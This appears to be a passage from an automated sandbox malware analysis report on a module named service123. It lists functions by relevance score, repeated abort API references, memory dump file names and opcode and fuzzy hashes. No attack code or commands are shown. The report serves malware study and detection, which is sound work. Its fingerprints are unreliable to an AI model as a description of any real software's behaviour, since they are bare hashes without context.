Instruction Fuzzy Hash: 97F020305CE12B8E8721AA2C5850CE2B337BB8770CBD91986D4816FF28D212D503CF96

Function 6C38BEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eacffbe0daee842cab4d9255ab1ce91b34fe7924331f0c8cbd1a2ff138fd5c1
Instruction ID: f29f3de7e9c66566ee5b70542878eb565f9cdac1d75ec69beb85c802d575b8b1
Opcode Fuzzy Hash: 7eacffbe0daee842cab4d9255ab1ce91b34fe7924331f0c8cbd1a2ff138fd5c1
Instruction Fuzzy Hash: 05014972A0AA2307D7108E75C8A1361BB926B8221CF098669CD751BF9AC235A8189E50

Function 6C38BC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 3e4753474d7f59f9698eee09217a767584cb491d1320b98b6dd689697c25b519
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: 3FE08C3264E31A4B8520AD98B8408EBF258DB4276DF511C28C958A7E10E341E81C8AC7

Function 6C38BE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 54bd8e126a3c41c518b040f7f81122907fc3d0fb051de8b4ac0904b9bdccf2d8
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 45D0A73054E21B4F8B049F2C5098CAEF3F9AB4630C75A5C98C049F7E05F621EA098E09

Function 6C38BE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: caf69a29630d35de9c8b57a5be69c9f54f89081e61d7a447b810636f452db81c
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 03D0173018A70A8F8310EF08D1948AAF7E9EB4A319B459D69C44897F20E631D408CE16

Function 6C38BDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: d366c7b097d413cc75c32a1cdb5284e7e72fd5c43111b8d534c8eb58af60f3f2
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: E9C0123198E3194FC5206D9814507A7F298DB0761DF522C18899933F009B51E8088D5A

Function 6C38BE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: 45625c60bfe111759a4f3ec8b5eeca60822f6e66e40ba61dd007d03f65c66736
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: 86C0123564E3168F8620EE8490508EAF268EB4B30CF412C54C94577F109760E508CD56

Function 6C38BDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 95cb53b1fca2b0dee390477dd32ff390cdda3f1d0abf5d1b1f849a62955d6250
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 98C08C309CE31A4B00207D0824908BAF2A8870723CB8A2D14C44833F00EA02D8088C5A

Function 6C38C150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 721c0f94956a086d4cf42991990073f27606757e2af82e21cc47af882cdd0bc5
Instruction ID: 9ac8dedac1bc687a3bcd025382f74d981695a70c8a3632ee003c2b95582ce5ac
Opcode Fuzzy Hash: 721c0f94956a086d4cf42991990073f27606757e2af82e21cc47af882cdd0bc5
Instruction Fuzzy Hash: BEB1E5716093468FDB10DF58D480B5ABBF1BF86308F084A6DE9949BB42D375E845CF92

Function 6C38C470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

